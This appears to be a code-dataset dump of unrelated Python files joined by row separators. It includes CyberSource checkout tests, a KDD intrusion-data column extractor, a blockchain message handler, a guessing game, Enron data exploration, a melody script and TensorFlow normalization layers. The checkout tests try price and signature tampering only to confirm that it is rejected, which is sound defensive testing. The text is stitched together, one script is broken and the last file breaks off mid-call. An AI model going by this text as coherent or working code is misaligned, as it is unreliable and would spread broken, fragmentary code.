def check_finished_order(self, number, product_id, quantity=1):
# Order exists and was paid for
self.assertEqual(Order.objects.all().count(), 1)
order = Order.objects.get()
self.assertEqual(order.number, number)
lines = order.lines.all()
self.assertEqual(lines.count(), 1)
line = lines[0]
self.assertEqual(line.quantity, quantity)
self.assertEqual(line.product_id, product_id)
payment_events = order.payment_events.filter(event_type__name="Authorise")
self.assertEqual(payment_events.count(), 1)
self.assertEqual(payment_events[0].amount, order.total_incl_tax)
payment_sources = order.sources.all()
self.assertEqual(payment_sources.count(), 1)
self.assertEqual(payment_sources[0].currency, order.currency)
self.assertEqual(payment_sources[0].amount_allocated, order.total_incl_tax)
self.assertEqual(payment_sources[0].amount_debited, D('0.00'))
self.assertEqual(payment_sources[0].amount_refunded, D('0.00'))
transactions = payment_sources[0].transactions.all()
self.assertEqual(transactions.count(), 1)
self.assertEqual(transactions[0].txn_type, 'Authorise')
self.assertEqual(transactions[0].amount, order.total_incl_tax)
self.assertEqual(transactions[0].status, 'ACCEPT')
self.assertEqual(transactions[0].log_field('req_reference_number'), order.number)
self.assertEqual(transactions[0].token.card_last4, '1111')
self.assertEqual(len(mail.outbox), 1)
class CheckoutIntegrationTest(BaseCheckoutTest):
"""Full Integration Test of Checkout"""
def test_checkout_process(self):
"""Full checkout process using minimal api calls"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
cs_url, cs_data = self.do_sign_auth_request(basket_id)
res = self.do_cybersource_post(cs_url, cs_data)
self.assertEqual(res.status_code, 302)
self.check_finished_order(cs_data['reference_number'], product.id)
def test_add_product_during_auth(self):
"""Test attempting to add a product during the authorize flow"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
# Adding a product here should succeed
res = self.do_add_to_basket(product.id)
basket1 = res.data['id']
self.assertEqual(res.status_code, 200)
cs_url, cs_data = self.do_sign_auth_request(basket_id)
# Adding a product here should go to a new basket, not the one we're auth'ing
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
basket2 = res.data['id']
self.assertNotEqual(basket1, basket2)
res = self.do_cybersource_post(cs_url, cs_data)
self.assertEqual(res.status_code, 302)
self.check_finished_order(cs_data['reference_number'], product.id)
# Adding a product here should go to basket2, not basket1
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
basket3 = res.data['id']
self.assertEqual(basket2, basket3)
def test_pay_for_nothing(self):
"""Test attempting to pay for an empty basket"""
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
data = {
"guest_email": "herp@example.com",
"basket": reverse('basket-detail', args=[basket_id]),
"shipping_address": {
"first_name": "fadsf",
"last_name": "fad",
"line1": "234 5th Ave",
"line4": "Manhattan",
"postcode": "10001",
"state": "NY",
"country": reverse('country-detail', args=['US']),
"phone_number": "+1 (717) 467-1111",
}
}
url = reverse('cybersource-sign-auth-request')
res = self.client.post(url, data, format='json')
self.assertEqual(res.status_code, 406)
def test_manipulate_total_pre_auth(self):
"""Test attempting to manipulate basket price when requesting an auth form"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['total_incl_tax'], '10.00')
url = reverse('cybersource-sign-auth-request')
data = {
"guest_email": "herp@example.com",
"basket": reverse('basket-detail', args=[basket_id]),
"total": "2.00", # Try and get $10 of product for only $2
"shipping_address": {
"first_name": "fadsf",
"last_name": "fad",
"line1": "234 5th Ave",
"line4": "Manhattan",
"postcode": "10001",
"state": "NY",
"country": reverse('country-detail', args=['US']),
"phone_number": "+1 (717) 467-1111",
}
}
res = self.client.post(url, data, format='json')
self.assertEqual(res.status_code, 406)
def test_manipulate_total_during_auth(self):
"""Test attempting to manipulate basket price when requesting auth from CyberSource"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['total_incl_tax'], '10.00')
cs_url, cs_data = self.do_sign_auth_request(basket_id)
cs_data['amount'] = '2.00'
res = requests.post(cs_url, cs_data)
self.assertEqual(res.status_code, 403)
def test_free_product(self):
"""Full checkout process using minimal api calls"""
product = self.create_product(price=D('0.00'))
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
cs_url, cs_data = self.do_sign_auth_request(basket_id)
self.assertEqual(cs_data['amount'], '0.00')
res = self.do_cybersource_post(cs_url, cs_data)
self.assertEqual(res.status_code, 302)
self.check_finished_order(cs_data['reference_number'], product.id)
class CSReplyViewTest(BaseCheckoutTest):
"""Test the CybersourceReplyView with fixtured requests"""
def prepare_basket(self):
"""Setup a basket and session like SignAuthorizePaymentFormView would normally"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
session = self.client.session
session[CHECKOUT_BASKET_ID] = basket_id
session[CHECKOUT_ORDER_NUM] = str(randrange(1000000, 9999999))
session[CHECKOUT_SHIPPING_CODE] = 'free-shipping'
session.save()
return session, basket_id, session[CHECKOUT_ORDER_NUM]
@patch('cybersource.signals.order_placed.send')
def test_invalid_signature(self, order_placed):
"""Invalid signature should result in 400 Bad Request"""
session, basket_id, order_number = self.prepare_basket()
data = cs_factories.build_declined_reply_data(order_number)
data = cs_factories.sign_reply_data(data)
data['signature'] = 'abcdef'
url = reverse('cybersource-reply')
resp = self.client.post(url, data)
self.assertEqual(resp.status_code, 400)
self.assertEqual(len(mail.outbox), 0, 'Should not send email')
self.assertEqual(order_placed.call_count, 0, 'Should not trigger signal')
self.assertEqual(Order.objects.count(), 0, 'Should not make order')
@patch('cybersource.signals.order_placed.send')
def test_invalid_request_type(self, order_placed):
"""Bad request type should result in 400 Bad Request"""
session, basket_id, order_number = self.prepare_basket()
data = cs_factories.build_declined_reply_data(order_number)
data["req_transaction_type"] = "payment",
data = cs_factories.sign_reply_data(data)
url = reverse('cybersource-reply')
resp = self.client.post(url, data)
self.assertEqual(resp.status_code, 400)
self.assertEqual(len(mail.outbox), 0, 'Should not send email')
self.assertEqual(order_placed.call_count, 0, 'Should not trigger signal')
self.assertEqual(Order.objects.count(), 0, 'Should not make order')
@patch('cybersource.signals.order_placed.send')
def test_duplicate_transaction_id(self, order_placed):
"""Duplicate Transaction ID should result in redirect to the success page"""
session, basket_id, order_number = self.prepare_basket()
data = cs_factories.build_accepted_reply_data(order_number)
data = cs_factories.sign_reply_data(data)
url = reverse('cybersource-reply')
self.assertEqual(order_placed.call_count, 0)
self.assertEqual(Order.objects.count(), 0)
resp = self.client.post(url, data)
self.assertRedirects(resp, reverse('checkout:thank-you'))
self.assertEqual(order_placed.call_count, 1)
self.assertEqual(Order.objects.count(), 1)
resp = self.client.post(url, data)
self.assertRedirects(resp, reverse('checkout:thank-you'))
self.assertEqual(order_placed.call_count, 1)
self.assertEqual(Order.objects.count(), 1)
@patch('cybersource.signals.order_placed.send')
def test_invalid_reference_number(self, order_placed):
"""Mismatched reference number should result in 400 Bad Request"""
session, basket_id, order_number = self.prepare_basket()
data = cs_factories.build_accepted_reply_data(order_number + 'ABC')
data = cs_factories.sign_reply_data(data)
url = reverse('cybersource-reply')
resp = self.client.post(url, data)
self.assertEqual(resp.status_code, 400)
self.assertEqual(order_placed.call_count, 0)
self.assertEqual(Order.objects.count(), 0)
@patch('cybersource.signals.order_placed.send')
def test_missing_basket(self, order_placed):
"""Missing basket should result in 400 Bad Request"""
session, basket_id, order_number = self.prepare_basket()
del session[CHECKOUT_BASKET_ID]
session.save()
data = cs_factories.build_accepted_reply_data(order_number)
data = cs_factories.sign_reply_data(data)
url = reverse('cybersource-reply')
resp = self.client.post(url, data)
self.assertEqual(resp.status_code, 400)
self.assertEqual(order_placed.call_count, 0)
self.assertEqual(Order.objects.count(), 0)
@patch('cybersource.signals.order_placed.send')
def test_declined_card(self, order_placed):
"""Declined card should should result in redirect to failure page"""
session, basket_id, order_number = self.prepare_basket()
data = cs_factories.build_declined_reply_data(order_number)
data = cs_factories.sign_reply_data(data)
url = reverse('cybersource-reply')
resp = self.client.post(url, data)
self.assertRedirects(resp, reverse('checkout:index'), fetch_redirect_response=False)
self.assertEqual(len(mail.outbox), 0, 'Should not send email')
self.assertEqual(order_placed.call_count, 0, 'Should not trigger signal')
self.assertEqual(Order.objects.count(), 0, 'Should not make order')
@patch('cybersource.signals.order_placed.send')
def test_success(self, order_placed):
"""Successful authorization should create an order and redirect to the success page"""
session, basket_id, order_number = self.prepare_basket()
data = cs_factories.build_accepted_reply_data(order_number)
data = cs_factories.sign_reply_data(data)
url = reverse('cybersource-reply')
self.assertEqual(order_placed.call_count, 0)
resp = self.client.post(url, data)
self.assertRedirects(resp, reverse('checkout:thank-you'))
self.assertEqual(len(mail.outbox), 1, 'Should send email')
self.assertEqual(order_placed.call_count, 1, 'Should trigger order_placed signal')
order = order_placed.call_args[1]['order']
self.assertEqual(order.status, 'Authorized', 'Should set order status')
self.assertEqual(order.basket.id, basket_id, 'Should use basket from session')
self.assertEqual(order.number, order_number, 'Should use order number from CS request')
session = self.client.session
self.assertEquals(session[CHECKOUT_ORDER_ID], order.id, 'Should save order_id in session')
self.assertEqual(order.sources.count(), 1, 'Should save pPaymentSource')
source = order.sources.first()
self.assertEqual(source.currency, 'USD')
self.assertEqual(source.amount_allocated, D('99.99'))
self.assertEqual(source.amount_refunded, D('0.00'))
self.assertEqual(source.amount_debited, D('0.00'))
self.assertEqual(source.transactions.count(), 1, 'Should save Transaction')
transaction = source.transactions.first()
self.assertEqual(transaction.log.data, data)
self.assertEqual(transaction.token.log, transaction.log)
self.assertEqual(transaction.token.masked_card_number, 'xxxxxxxxxxxx1111')
self.assertEqual(transaction.token.card_type, '001')
self.assertEqual(transaction.txn_type, 'Authorise')
self.assertEqual(transaction.amount, D('99.99'))
self.assertEqual(transaction.reference, data['transaction_id'])
self.assertEqual(transaction.status, 'ACCEPT')
self.assertEqual(transaction.request_token, data['request_token'])
self.assertEqual(order.payment_events.count(), 1, 'Should save PaymentEvent')
event = order.payment_events.first()
self.assertEqual(event.amount, D('99.99'))
self.assertEqual(event.reference, data['transaction_id'])
self.assertEqual(event.event_type.name, 'Authorise')
self.assertEqual(event.line_quantities.count(), 1, 'Should save PaymentEventQuantity')
lq = event.line_quantities.first()
self.assertEqual(lq.line, order.lines.first())
self.assertEqual(lq.quantity, 1)
class AuthPaymentFormViewTest(BaseCheckoutTest):
"""Test the SignAuthorizePaymentFormView"""
def prepare_basket(self):
"""Setup a basket so that we can pay for it"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
return basket_id
@patch('cybersource.signals.pre_build_auth_request.send')
@patch('cybersource.signals.pre_calculate_auth_total.send')
def test_request_auth_form_success(self, pre_calculate_auth_total, pre_build_auth_request):
basket_id = self.prepare_basket()
# Add some taxes to the basket
def add_taxes(sender, basket, shipping_address, **kwargs):
for line in basket.all_lines():
line.purchase_info.price.tax = D('0.42')
pre_calculate_auth_total.side_effect = add_taxes
# Add an extra field into the request
def add_a_field(sender, extra_fields, request, basket, **kwargs):
extra_fields['my_custom_field'] = 'ABC'
pre_build_auth_request.side_effect = add_a_field
# Pregenerate the order number
session = self.client.session
session[CHECKOUT_ORDER_NUM] = '10000042'
session.save()
cs_url, data = self.do_sign_auth_request(basket_id=basket_id)
# CS URL should be correct
self.assertEqual(cs_url, 'https://testsecureacceptance.cybersource.com/silent/pay')
# Basket ID should be stored in the session
session = self.client.session
self.assertEqual(session[CHECKOUT_BASKET_ID], basket_id)
# Basket must be frozen
basket = Basket.objects.get(id=basket_id)
self.assertFalse(basket.can_be_edited)
# Make sure each signal got called
self.assertEqual(pre_calculate_auth_total.call_count, 1)
self.assertEqual(pre_build_auth_request.call_count, 1)
# Check response fields
self.assertEquals(data['amount'], '10.42')
self.assertEquals(data['bill_to_address_city'], 'Manhattan')
self.assertEquals(data['bill_to_address_country'], 'US')
self.assertEquals(data['bill_to_address_line1'], '234 5th Ave')
self.assertEquals(data['bill_to_address_line2'], 'apt 5')
self.assertEquals(data['bill_to_address_postal_code'], '10001')
self.assertEquals(data['bill_to_address_state'], 'NY')
self.assertEquals(data['bill_to_email'], 'herp@example.com')
self.assertEquals(data['bill_to_forename'], 'Testy')
self.assertEquals(data['bill_to_phone'], '17174671111')
self.assertEquals(data['bill_to_surname'], 'McUnitTest')
self.assertEquals(data['card_cvn'], '123')
self.assertEquals(data['card_expiry_date'], '12-2017')
self.assertEquals(data['card_number'], '4111111111111111')
self.assertEquals(data['card_type'], '001')
self.assertEquals(data['currency'], 'USD')
self.assertEquals(data['customer_ip_address'], '127.0.0.1')
self.assertEquals(data['device_fingerprint_id'], '')
self.assertEquals(data['item_0_name'], 'My Product')
self.assertEquals(data['item_0_quantity'], '1')
self.assertEquals(data['item_0_sku'], basket.all_lines()[0].stockrecord.partner_sku)
self.assertEquals(data['item_0_unit_price'], '10.42')
self.assertEquals(data['line_item_count'], '1')
self.assertEquals(data['locale'], 'en')
self.assertEquals(data['my_custom_field'], 'ABC')
self.assertEquals(data['payment_method'], 'card')
self.assertEquals(data['reference_number'], '10000042')
self.assertEquals(data['ship_to_address_city'], 'Manhattan')
self.assertEquals(data['ship_to_address_country'], 'US')
self.assertEquals(data['ship_to_address_line1'], '234 5th Ave')
self.assertEquals(data['ship_to_address_line2'], '')
self.assertEquals(data['ship_to_address_postal_code'], '10001')
self.assertEquals(data['ship_to_address_state'], 'NY')
self.assertEquals(data['ship_to_forename'], 'fadsf')
self.assertEquals(data['ship_to_phone'], '17174671111')
self.assertEquals(data['ship_to_surname'], 'fad')
self.assertEquals(data['transaction_type'], 'authorization,create_payment_token')
|
5,124 | ce28330db66dcdfad63bdac698ce9d285964d288 | import pandas as pd
file = pd.read_csv("KDDTest+.csv")
with open("test_9feats.csv", "w") as f:
df = pd.DataFrame(file,
columns=[
"dst_host_srv_serror_rate", "dst_host_serror_rate",
"serror_rate", "srv_serror_rate", "count", "flag",
"same_srv_rate", "dst_host_srv_count",
"dst_host_diff_srv_rate", "Malicious"
])
df.to_csv(f, index=False, header=True, line_terminator='\n')
print(df) |
5,125 | 55b8590410bfe8f12ce3b52710238a79d27189a7 | import logging
from utils import Utils
from block import Block
from message import Message
from transaction import Transaction
class Response:
def __init__(self, node, data):
self.node = node
self.data = data
self.selector()
def selector(self):
if self.data['flag'] == 1:
self.chain_size()
elif self.data['flag'] == 2:
self.chain_sync()
elif self.data['flag'] == 3:
if isinstance(self.data['content'], bool):
self.append_new_block()
else:
self.new_block()
else:
self.new_transaction()
def chain_size(self):
server_chain_size = self.node.get_ledger_size()
self.return_response(1, server_chain_size)
def chain_sync(self):
u = Utils()
blocks = [u.dict_to_json(block) for block in self.node.get_server_ledger()]
self.return_response(2, blocks)
def new_block(self):
b = Block()
block = self.data['content'][0]
if not self.node.get_server_ledger():
# Server has no chain, cannot validate previous hash
logging.error('{0}Peer #{1}: cannot validate blocks! Authorizing!'.format(self.node.type,self.node.index))
self.return_response(3, block)
else:
if b.validate(block):
self.node.server.write_message('announce', 1, block['index'])
self.node.add_block(block)
self.return_response(3, block)
else:
self.node.server.write_message('announce', 2, block['index'])
self.return_response(3)
def new_transaction(self):
t = Transaction()
tx = self.data['content'][0][0]
if t.validate(tx):
self.node.server.shared_tx.append(tx)
self.return_response(4, tx)
else:
self.return_response(4)
def return_response(self, flag, content=None):
m = Message()
response = m.create('response', flag, [content])
self.node.send(response)
|
5,126 | 700b0b12c75fa502da984319016f6f44bc0d52cc | /home/lidija/anaconda3/lib/python3.6/sre_constants.py |
5,127 | dc5d56d65417dd8061a018a2f07132b03e2d616e | # 15650번 수열 2번째
n, m = list(map(int, input().split()))
arr = [i for i in range(1,n+1)]
check = []
def seq(ctn, array, l):
if sorted(check) in array:
return
# if ctn == m:
# # l+=1
# # print('ctn :',ctn,' check :',sorted(check))
# array.append(sorted(check))
# for k in range(m):
# print(check[k], end = ' ')
# print()
# return
for i in range(n):
l += 1
check.append(arr[i])
seq(ctn+1, array, l)
check.pop()
print('l :',l,' i :',i)
seq(0,[], 1) |
5,128 | 8498ba69e4cc5c5f480644ac20d878fb2a632bee | '''
Confeccionar un programa que genere un número aleatorio entre 1 y 100 y no se muestre.
El operador debe tratar de adivinar el número ingresado.
Cada vez que ingrese un número mostrar un mensaje "Gano" si es igual al generado o "El número aleatorio el mayor" o "El número aleatorio es menor".
Mostrar cuando gana el jugador cuantos intentos necesitó.
'''
import random
def generar_numero_aleatorio():
return random.randint(1,100)
def es_el_numero(resp_usuario,resp_correc):
return resp_usuario == resp_correc
def numero_dado_es_mayor(resp_usuario,resp_correc):
return resp_usuario > resp_correc
def juego_terminado(numero_correcto,numero_intentos):
print("El juego ha terminado!")
print("El numero correcto era",numero_correcto,"y lo resolviste en",numero_intentos,"intentos.",sep=" ")
def el_numero_es_mayor():
print("El numero que diste es mayor al correcto, intenta de nuevo!")
def el_numero_es_menor():
print("El numero que diste es menor al correcto, intenta de nuevo!")
def iniciar_juego():
gano = False
intentos = 1
numero = 0
respuesta_correc = generar_numero_aleatorio()
while (not gano):
numero = int(input("Ingresa un numero: "))
if (es_el_numero(numero,respuesta_correc)):
juego_terminado(respuesta_correc,intentos)
gano = True
else:
if (numero_dado_es_mayor(numero,respuesta_correc)):
el_numero_es_mayor()
else:
el_numero_es_menor()
intentos += 1
iniciar_juego()
|
5,129 | c5d224a3d63d0d67bc7a48fecec156cca41cdcf7 | #!/usr/bin/python
"""
Starter code for exploring the Enron dataset (emails + finances);
loads up the dataset (pickled dict of dicts).
The dataset has the form:
enron_data["LASTNAME FIRSTNAME MIDDLEINITIAL"] = { features_dict }
{features_dict} is a dictionary of features associated with that person.
You should explore features_dict as part of the mini-project,
but here's an example to get you started:
enron_data["SKILLING JEFFREY K"]["bonus"] = 5600000
"""
import pickle
import math
enron_data = pickle.load(open("../final_project/final_project_dataset.pkl", "r"))
def print_it():
for x in enron_data:
print (x)
for y in enron_data[x]:
print (y,':',enron_data[x][y])
#print_it()
print "persons:", len(enron_data)
print "features:", len(enron_data["SKILLING JEFFREY K"])
pois = 0
for n in enron_data:
if enron_data[n]["poi"] == 1:
pois = pois + 1
print "nbr of poi:", pois
print "stock value James Prentice:", enron_data["PRENTICE JAMES"]["total_stock_value"]
print "Wesley Colwell sent mail to pois:", enron_data["COLWELL WESLEY"]["from_this_person_to_poi"], "times"
print "Jeffrey K Skilling exercised stock:", enron_data["SKILLING JEFFREY K"]["exercised_stock_options"]
print "money for Lay:", enron_data["LAY KENNETH L"]["total_payments"], ", Skilling:", enron_data["SKILLING JEFFREY K"]["total_payments"], " & Fastow:", enron_data["FASTOW ANDREW S"]["total_payments"]
salary = 0
email = 0
for n in enron_data:
if not enron_data[n]["salary"] == "NaN":
salary = salary + 1
if not enron_data[n]["email_address"] == "NaN":
email = email + 1
print "nbr of salary:", salary, ", email: ", email
total_pay = 0
for n in enron_data:
if enron_data[n]["total_payments"] == "NaN":
total_pay = total_pay + 1
print "% not salary:", (total_pay * 100 / len(enron_data)), ", ", total_pay
total_pay_pois = 0
for n in enron_data:
if enron_data[n]["poi"] == 1:
if enron_data[n]["total_payments"] == "NaN":
total_pay_pois = total_pay_pois + 1
print "% not salary & poi:", (total_pay_pois * 100 / pois) |
5,130 | ac83d7d39319c08c35302abfb312ebee463b75b2 | import sys
from melody_types import *
import dataclasses
"""
Marks notes for grace notes
"""
# Mark grace notes on the peak note of every segment
def _peaks(song):
for phrase in song.phrases:
for pe in phrase.phrase_elements:
if type(pe) == Segment:
if pe.direction != SegmentDirection.UPDOWN:
continue
# Get peak note
for i in range(1, len(pe.notes)):
if pe.notes[i].pitch < pe.notes[i - 1].pitch:
pe.notes[i - 1].grace = True
print('sup', file=sys.stderr)
break
# Adds a grace note to consonant notes in every segment
def _consonant(song):
pass
def _insert_grace_notes(song):
for phrase in song.phrases:
for pe in phrase.phrase_elements:
if type(pe) != Segment:
continue
segment = pe
initial_len = len(segment.notes)
new_notes = []
flag = False
for i in range(len(pe.notes)):
if segment.notes[i].grace and not flag:
new_note = Note(pitch=phrase.scale.skip_up(segment.notes[i].pitch, 1), new=True, duration=1/4)
new_notes += [new_note]
segment.notes[i].duration -= 1/4
flag = True
new_notes += [dataclasses.replace(segment.notes[i])]
assert(len(new_notes) - initial_len <= 1)
pe.notes = list(new_notes)
def add_grace_notes(song):
_peaks(song)
_insert_grace_notes(song)
|
5,131 | 940c3b4a2b96907644c0f12deddd8aba4086a0f0 | # -*- coding: utf-8 -*-
from tensorflow.python.ops.image_ops_impl import ResizeMethod
import sflow.core as tf
from sflow.core import layer
import numpy as np
# region arg helper
def _kernel_shape(nd, k, indim, outdim):
if isinstance(k, int):
k = [k for _ in range(nd)]
k = list(k)
assert len(k) == nd
k.extend([indim, outdim])
return k
def _stride_shape(nd, s):
"""
:param nd:
:param s: int | list | tuple
:return:
"""
if isinstance(s, int):
s = [s for _ in range(nd)]
s = list(s)
assert len(s) == nd
s = [1] + s + [1]
return s
# endregion
# region conv
# @layer
# @patchmethod(tf.Tensor, tf.Variable)
@layer
def conv(x, outdim, kernel=3, stride=1, pad=0, padding='SAME', mode='CONSTANT',
initializer=tf.he_uniform, bias=False, **kwargs):
nd = x.ndim
if nd == 3:
return conv1d(x, outdim, kernel, stride=stride, pad=pad, padding=padding, mode=mode,
initializer=initializer, bias=bias, **kwargs)
elif nd == 4:
return conv2d(x, outdim, kernel, stride=stride, pad=pad, padding=padding, mode=mode,
initializer=initializer, bias=bias, **kwargs)
elif nd == 5:
return conv3d(x, outdim, kernel, stride=stride, pad=pad, padding=padding, mode=mode,
initializer=initializer, bias=bias, **kwargs)
else:
raise ValueError('conv for {nd}? nd <= 5'.format(nd=nd))
@layer
def conv1d(x, outdim, kernel, stride=1, pad=0, padding='SAME', mode='CONSTANT',
initializer=tf.he_uniform, bias=False, **kwargs):
kernel = _kernel_shape(1, kernel, x.dims[-1], outdim)
pads = None
if padding == 'SAME' and mode != 'CONSTANT':
# pad manually
half = (kernel[0] - 1) // 2
pads = [(0, 0), (pad + half, pad + kernel[0] - 1 - half), (0, 0)]
padding = 'VALID' # change to valid because manually padded
elif pad:
pads = [(0, 0), (pad, pad), (0, 0)]
if pads is not None:
x = tf.pad(x, pads, mode=mode)
W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
out = tf.nn.conv1d(x, W, stride, padding)
if bias:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
out = tf.nn.bias_add(out, b)
return out
@layer
def conv2d(x, outdim, kernel, stride=1, pad=0, padding='SAME', mode='CONSTANT',
initializer=tf.he_uniform, bias=False, **kwargs):
kernel = _kernel_shape(2, kernel, x.dims[-1], outdim)
stride = _stride_shape(2, stride)
pads = None
if padding == 'SAME' and mode != 'CONSTANT':
# pad manually
half = ((kernel[0] - 1) // 2, (kernel[1] - 1) // 2)
pads = [(0, 0),
(pad + half[0], pad + kernel[0] - 1 - half[0]),
(pad + half[1], pad + kernel[1] - 1 - half[1]), (0, 0)]
padding = 'VALID' # change to valid because manually padded
elif pad:
pads = [(0, 0), (pad, pad), (pad, pad), (0, 0)]
if pads is not None:
x = tf.pad(x, pads, mode=mode)
W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
out = tf.nn.conv2d(x, W, stride, padding)
if bias:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
out = tf.nn.bias_add(out, b)
return out
@layer
def conv3d(x, outdim, kernel, stride=1, pad=0, padding='SAME', mode='CONSTANT',
initializer=tf.he_uniform, bias=False, **kwargs):
kernel = _kernel_shape(3, kernel, x.dims[-1], outdim)
stride = _stride_shape(3, stride) # stride 5-dim
pads = None
if padding == 'SAME' and mode != 'CONSTANT':
# pad manually
half = ((kernel[0] - 1) // 2, (kernel[1] - 1) // 2, (kernel[2] - 1) // 2)
pads = [(0, 0),
(pad + half[0], pad + kernel[0] - 1 - half[0]),
(pad + half[1], pad + kernel[1] - 1 - half[1]),
(pad + half[2], pad + kernel[2] - 1 - half[2]), (0, 0)]
padding = 'VALID' # change to valid because manually padded
elif pad:
pads = [(0, 0), (pad, pad), (pad, pad), (pad, pad), (0, 0)]
if pads is not None:
x = tf.pad(x, pads, mode=mode)
W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
out = tf.nn.conv3d(x, W, stride, padding)
if bias:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
out = tf.nn.bias_add(out, b)
return out
# endregion
# region normalization
@layer
def bn(x, stddev=0.002, beta=0.0, gamma=1.0, epsilon=1e-5, momentum=0.99, axis=-1, training=None, **kwargs):
if kwargs.pop('scale', True):
init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
else:
init_gamma = None
if kwargs.pop('center', True):
init_beta = tf.constant_initializer(beta)
else:
init_beta = None
reuse = tf.get_variable_scope().reuse
if training is None and (reuse or kwargs.get('reuse', False)):
training = False
elif training is None:
training = x.graph.is_training
# reuse = reuse is None or reuse is True
out = tf.layers.batch_normalization(x, axis=axis, momentum=momentum, epsilon=epsilon,
beta_initializer=init_beta,
gamma_initializer=init_gamma,
moving_mean_initializer=tf.zeros_initializer(),
moving_variance_initializer=tf.ones_initializer(),
training=training,
**kwargs
)
return out
@layer
def renorm(x, axis=-1, momentum=0.99, epsilon=0.001, training=None,
gamma=1.0, beta=0.0, stddev=0.002,
renorm_momentum=0.99, renorm_clipping=None,
**kwargs):
"""
https://arxiv.org/abs/1702.03275
https://www.tensorflow.org/api_docs/python/tf/layers/batch_normalization
:param x:
:param dict renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to scalar Tensors
used to clip the renorm correction. The correction (r, d) is used as corrected_value = normalized_value * r + d,
with r clipped to [rmin, rmax], and d to [-dmax, dmax].
Missing rmax, rmin, dmax are set to inf, 0, inf, respectively.
:return:
"""
init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
init_beta = tf.constant_initializer(beta)
reuse = tf.get_variable_scope().reuse
if training is None and (reuse or kwargs.get('reuse', False)):
training = False
elif training is None:
training = x.graph.is_training
if renorm_clipping is not None:
if renorm_clipping.get('rmin', None) is None:
rmax = renorm_clipping.get('rmax', None)
if rmax is not None and not np.isinf(rmax):
rmin = 1 / rmax
renorm_clipping['rmin'] = rmin
out = tf.layers.batch_normalization(x, axis=axis, momentum=momentum, epsilon=epsilon,
beta_initializer=init_beta,
gamma_initializer=init_gamma,
training=training,
renorm=True,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_momentum,
**kwargs
)
return out
@layer
def inorm(x, beta=0.0, gamma=1.0, stddev=0.002, epsilon=1e-5, axis=None, trainable=True, **kwargs):
"""
instance normalization normalization for (W,H)
same output not regard to trainmode
# https://arxiv.org/pdf/1607.08022.pdf for instance normalization
# z = gamma * (x-m)/s + beta
# note gamma, beta
:param x: [BHWC] is common case
:param gamma:
:param beta:
:param epsilon:
:return:
"""
axes = list(range(1, 1 + x.ndim-2)) # axes = [1,2] for BWHC except batch, channel
m, v = tf.nn.moments(x, axes=axes, keep_dims=True)
shapelast = x.dims[-1:]
if trainable:
init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
init_beta = tf.constant_initializer(beta)
gamma_t = tf.get_weight(name='gamma', shape=shapelast, initializer=init_gamma)
beta_t = tf.get_bias(name='beta', shape=shapelast, initializer=init_beta)
else:
gamma_t = gamma
beta_t = beta
# out = (x - m) / tf.sqrt(v + epsilon)
# out = tf.nn.batch_normalization(x, m, v, beta, gamma, epsilon)
out = tf.nn.batch_normalization(x, m, v, offset=beta_t, scale=gamma_t, variance_epsilon=epsilon)
return out
@layer
def cnorm(x, labels, klass=None, stddev=0.01, beta=0.0, gamma=1.0, epsilon=1e-5):
"""
conditional instance normalization (by label index)
for learning embedding value of beta and gamma
# https://arxiv.org/pdf/1610.07629.pdf for conditional instance normalization
:param x:
:param labels: [B,]
:param klass: size of embedding var
:param gamma: initial_gamma
:param stddev: stddev for gamma random init
:param beta: initial beta value
:param epsilon: 1e-5 for var_epsilon
:return:
"""
# total klass count needs !!
assert klass is not None
init_gamma = tf.random_normal_initializer(mean=gamma, stddev=stddev)
init_beta = tf.constant_initializer(beta)
# params
shape = [1] * x.ndim
shape[0] = klass
shape[-1] = x.dims[-1] # ones but last channel axis
# [klass, 1, 1, C] for [BHWC] data
beta_v = tf.get_weight(name='beta', shape=shape, initializer=init_beta)
gamma_v = tf.get_weight(name='gamma', shape=shape, initializer=init_gamma)
# conditioned by label
# gather
beta_l = tf.nn.embedding_lookup(beta_v, labels)
gamma_l = tf.nn.embedding_lookup(gamma_v, labels)
return inorm(x, beta=beta_l, gamma=gamma_l, epsilon=epsilon)
@layer
def lnorm(x, center=True, scale=True, activation_fn=None, reuse=None,
variables_collections=None, outputs_collections=None,
trainable=True, begin_norm_axis=1, begin_params_axis=-1,
scope=None,
**kwargs):
"""
# layer normalization
:param x:
:return:
"""
return tf.contrib.layers.layer_norm(x, center=center, scale=scale,
activation_fn=activation_fn, reuse=reuse,
variables_collections=variables_collections,
outputs_collections=outputs_collections,
trainable=trainable,
begin_norm_axis=begin_norm_axis,
begin_params_axis=begin_params_axis,
scope=None,
